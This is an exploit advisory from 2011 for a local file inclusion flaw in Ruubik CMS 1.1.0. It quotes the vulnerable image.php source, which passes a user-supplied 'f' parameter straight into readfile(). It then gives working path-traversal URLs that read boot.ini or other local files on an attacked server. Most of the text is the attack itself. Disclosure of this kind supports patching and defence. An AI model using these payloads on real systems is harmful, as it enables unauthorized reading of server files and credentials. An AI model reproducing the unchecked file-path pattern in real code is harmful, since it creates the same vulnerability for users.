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Ruubik CMS 1.1.0 Local File Inclusion

Posted on 16 October 2011

# Exploit Title: [Ruubikcms v 1.1.0 (/extra/image.php) Local File Inclusion Vulnerability] # Date: [2011/10/16] # Author: [Sangyun YOO] # Software Link: [http://ruubikcms.com/ruubikcms/download.php?f=ruubikcms110.zip] # Version: [Ruubikcms v 1.1.0] # Tested on: [Windows 7 Starter K] --------------------------------------- source of /extra/image.php: 1: if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify 2: image."); 3: $fpath = BASE_DIR.$_GET['f']; 4: if (!is_file($fpath)) die("File does not exist."); 5: 6: // file size in bytes 7: // $fsize = filesize($fpath); 8: 9: // get mime type 10: $mtype = ''; 11: 12: if (function_exists('mime_content_type')) { 13: $mtype = mime_content_type($fpath); 14: } elseif (function_exists('finfo_file')) { 15: $finfo = finfo_open(FILEINFO_MIME); // return mime type 16: $mtype = finfo_file($finfo, $fpath); 17: finfo_close($finfo); 18: } 19: 20: if ($mtype == '') { 21: $mtype = "image/jpeg"; 22: } 23: 24: header("Content-type: $mtype"); 25: readfile($fpath); <--------------------- LFI proof of concept: http://[attacked_box]/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini http://[attacked_box]/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]